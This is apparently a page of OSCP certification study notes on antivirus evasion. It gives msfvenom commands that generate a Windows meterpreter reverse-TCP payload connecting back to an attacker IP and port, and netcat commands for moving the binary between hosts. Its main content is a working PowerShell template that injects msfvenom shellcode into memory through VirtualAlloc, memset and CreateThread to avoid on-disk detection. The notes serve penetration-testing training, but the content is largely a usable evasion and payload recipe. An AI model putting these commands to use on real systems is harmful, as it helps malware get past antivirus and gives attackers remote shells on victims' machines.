O
O
OSCP Notes
Search…
Antivirus Evasion

Detection Methods

Step 1: Generate portable execution file (PE)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f exe > binary.exe
Step 2: Run it through a virus scan website such as below
VirusTotal
VirusTotal
  • Be mindful when submitting executables online since as soon as you submit, it becomes public.
Step 3: Transfer the file to Windows for more analysis
#on Windows
nc.exe -nvlp 4455 > C:\Windows\Temp\binary.exe
#from kali
nc -w 3 IP 4455 < binary.exe

On disk evasion

  1. 1.
    Packers
  2. 2.
    Obfuscators
  3. 3.
    Crypters
  4. 4.
    Software Protectors

In Memory Injection (PE injection)

  • volatile memory

Powershell method (in-memory injection)

  • it's harder for the system to know since it's going to be run inside the interpreter and the script isn't executable code.
  • Below is the template. Create a malicious payload with msfvenom and put the payload inside the sc variable.
$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
$winFunc =
Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;
[Byte[]];
[Byte[]]$sc = <place your shellcode here>;
$size = 0x1000;
if ($sc.Length -gt 0x1000) {$size = $sc.Length};
$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};
$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };
using the VirtualAlloc, it inputs each byte of the payload to the newly allocated memory block.
The last line executes the payload with CreateThread.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f powershell
Copy link
Outline
Detection Methods
On disk evasion
In Memory Injection (PE injection)
Powershell method (in-memory injection)